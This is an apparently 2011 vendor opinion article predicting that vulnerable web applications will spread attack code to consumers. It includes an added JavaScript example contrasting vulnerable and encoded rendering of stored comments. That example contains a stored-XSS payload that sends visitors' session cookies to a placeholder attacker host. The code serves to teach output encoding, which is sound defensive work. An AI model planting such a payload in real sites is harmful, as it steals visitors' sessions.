In the past, end users of your web applications have been your biggest threat. In 2012, however, that relationship may be reversed as attackers are stepping up efforts to use your web applications as a channel to deliver attack-enabling malicious code to more and more unsuspecting Internet users. These infections, in turn, may end up targeting your systems in a vicious cycle.
It used to be that phishing and other focused social-engineering scams were the source of unsuspecting end-user infections. But education and the continuing evolution of end-user security agents that scan for viruses and malicious code have decreased the chances for attackers to successfully infiltrate clients.
Coupled with the growth of tablets, smartphones, and an expanding base of Internet-connected devices – all requiring specific, targeted code to exploit – attackers have turned their attention to more efficient means of distribution: web applications.
By leveraging standards like HTML and the near-universal support for web applications across platforms, attackers are able to harness the resources of consumers to attack websites nearly at will. Using vulnerabilities in existing web applications, attackers inject code into the data that drives those applications, where security tools rarely identify it as malicious.
Web Application Vulnerabilities Threaten Consumer Security
It turns out that a majority of web applications remain unable to prevent many of the OWASP Top 10 vulnerabilities and are therefore vulnerable to exploitation. WhiteHat Security’s Winter 2011 Website Security Statistics Report noted that “Most websites were exposed to at least one serious vulnerability every day of 2010, or nearly so (9–12 months of the year).
Only 16% of websites were vulnerable less than 30 days of the year overall.” The report goes on to present data indicating that the two most prevalent vulnerabilities present in web applications were cross-site scripting and generic “information leakage.”
This is troubling, as cross-site scripting enables attackers to plant their attack code, while information leakage vulnerabilities allow that malicious code to successfully carry out the theft of sensitive information. The relationship between the two should not be lightly dismissed: with a combination of the two, it is quite possible for an unwitting consumer to aid attackers in stealing their own personal data.
As web application standards like HTML5 continue to broaden the execution capabilities of the browser – and increase the number of platforms and devices on which such capabilities can be deployed – the attractiveness of scripting-based attacks is also increasing.
Attackers have already leveraged such attack tools to use resources on unwitting consumers' devices to successfully attack and disrupt the services of high-profile sites, and there is no reason to believe such attacks will diminish in the near future.
Indeed, with more and more adoption of HTML5 and Web 2.0 integrated applications, the reality is that such attacks are likely to increase.
Because the delivery mechanism for these tools is often web applications, it behooves system administrators and security professionals to ensure public-facing applications are well protected against exploitation of common vulnerabilities. Cross-site scripting and SQL injection attacks are well understood and yet often go unaddressed, despite the danger they pose to the integrity of both corporate resources and consumer environments.
Protecting Web Applications to Protect Consumers
It is increasingly the case that attackers leverage common web application vulnerabilities to plant attack code that is later delivered to unsuspecting consumers via the browser where the attack code is activated. This code may be used as part of a dynamic DoS attack, or as a mechanism to exploit yet another vulnerability in an effort to gain unauthorized access to systems or data. Your systems or data.
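The planting-and-delivery cycle described above (attacker-supplied data stored by the application, later rendered into a visitor's browser where it executes) is easiest to see in code. The following is an added example, not code from the article or from F5; the comment store, the payload and the host name attacker.example are all constructed for illustration. It shows a renderer that concatenates stored comments straight into the page beside one that encodes them, and a crude check that tells the two outputs apart:

```javascript
// Added example (not part of the original article): a minimal stored-XSS
// round trip. Attacker-controlled data is planted in the application's
// data store, then rendered into every visitor's page. A tool that only
// inspects the database sees an ordinary string; the browser sees code.
// Everything below is constructed; "attacker.example" is a placeholder.

// Constructed data store: one benign comment, one carrying a payload.
const comments = [
  { user: "alice", body: "Great article, thanks!" },
  {
    user: "mallory",
    // Constructed payload: when rendered unencoded it runs in the visitor's
    // browser and makes the visitor send their own session cookie to the
    // attacker, i.e. the consumer aids the theft of their own data.
    body: "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>",
  },
];

// Encode the characters that matter in HTML text context.
// Attribute, URL and JavaScript contexts each need their own encoder;
// reusing this one there is a common mistake.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[ch]);
}

// Vulnerable renderer: stored data goes straight into the markup.
function renderVulnerable(rows) {
  return rows.map((c) => `<li><b>${c.user}</b>: ${c.body}</li>`).join("\n");
}

// Hardened renderer: every untrusted value is encoded for its context.
function renderSafe(rows) {
  return rows
    .map((c) => `<li><b>${escapeHtml(c.user)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Crude check a unit test or response filter might apply: does the output
// introduce an executable <script> element? (Encoded text never does.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run both renderers over the same store and report which one ships
// the payload live. Returned as an object so it can be asserted on.
function demo() {
  const vulnerable = renderVulnerable(comments);
  const safe = renderSafe(comments);
  return {
    vulnerableExecutes: containsScriptTag(vulnerable), // payload is live
    safeExecutes: containsScriptTag(safe),             // payload is inert text
    safeHtml: safe,
  };
}

const result = demo();
console.log("vulnerable output executes payload:", result.vulnerableExecutes);
console.log("hardened output executes payload:  ", result.safeExecutes);
console.log(result.safeHtml);
```

Output encoding removes the execution path; it does not remove the stored payload, so a second page that renders the same row without encoding is still exposed. Marking session cookies HttpOnly and serving a Content-Security-Policy limit what a payload can do if one renderer is missed, but neither substitutes for encoding at every output point.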
The connection between web application security and the security of consumer devices and data should not be overlooked. Looking ahead to 2012, it is almost certainly the case that the cycle will gain even more traction as organizations adopt HTML5 as the standard for web application development.
The standard's expanded capabilities to communicate with both devices and sites provide new opportunities for attackers to exploit traditional vulnerabilities as well as newly discovered ones. The expansion of the client environment opens up more opportunity for attackers to take advantage of consumers and use their resources and reach to execute attacks of various designs.
Breaking the cycle requires web application providers to increase their own security, ensuring they have addressed the top vulnerabilities through which attackers plant attack code or are directly able to access systems and data for which they were never authorized.
Consumer web security is increasingly tied to web application security – and vice-versa. As the trend continues, it behooves organizations to do what they are able to interrupt the cycle of infection and distribution, and in the process reduce both their own risk and that of their visitors and end users.
About the author: Lori MacVittie is the Sr. Technical Marketing Manager for F5 Networks.
The Tech Herald welcomes 2012 related threat predictions from vendors, as long as they do not reference the end of the world and remain product neutral. All submissions are subject to editing and are due by December 20, 2011. Submissions can be delivered to [email protected] with the email subject of 2012 Predictions.